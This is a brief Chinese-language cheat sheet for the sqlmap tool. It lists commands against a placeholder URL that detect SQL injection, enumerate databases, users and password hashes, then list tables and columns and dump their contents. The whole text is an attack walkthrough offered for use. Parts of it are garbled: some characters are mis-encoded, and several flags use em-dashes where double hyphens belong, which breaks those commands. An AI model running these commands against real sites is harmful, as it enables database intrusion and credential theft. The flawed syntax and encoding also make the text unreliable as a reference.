基礎
1:檢測注入點是否可用?
? ? python sqlmap.py -u “http://www.target.com/example.asp?id=1”
1.1檢測結(jié)果
1.1.1注入type:
?? ?boolean-based blind
? ? error-based
? ? inline query
? ? stacked queries
? ? and/or time-based blind
? ? union query
1.1.2配置信息

? ? web服務器信息
? ? web應用程序技術
? ? 數(shù)據(jù)庫類型
1.2讓程序自動輸入若干詢問語句
??python sqlmap.py -u“http://www.target.com/example.asp?id=1”?--batch
2:爆庫
爆出其中所有數(shù)據(jù)庫的名字
? ? python sqlmap.py -u“http://www.target.com/example.asp?id=1”?--dbs

3:web當前使用的數(shù)據(jù)庫
?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?—-current-db

4:列出數(shù)據(jù)庫所有用戶
?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?—-users

5:web數(shù)據(jù)庫使用賬戶
?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?—-current-user

6:數(shù)據(jù)庫賬戶和密碼
?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?--passwords

7:列出數(shù)據(jù)庫中的表
?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?—D 數(shù)據(jù)庫名字 —-tables

8:列出表中的字段
?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?—D 數(shù)據(jù)庫名字 -T 表的名字—-columns

9:爆字段內(nèi)容
?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?—D 數(shù)據(jù)庫名字 -T 表的名字?—C 要爆的字段 (—-start 1?—-stop 10 ?)—-dump/制定開始的行和結(jié)束的行/將結(jié)果導出
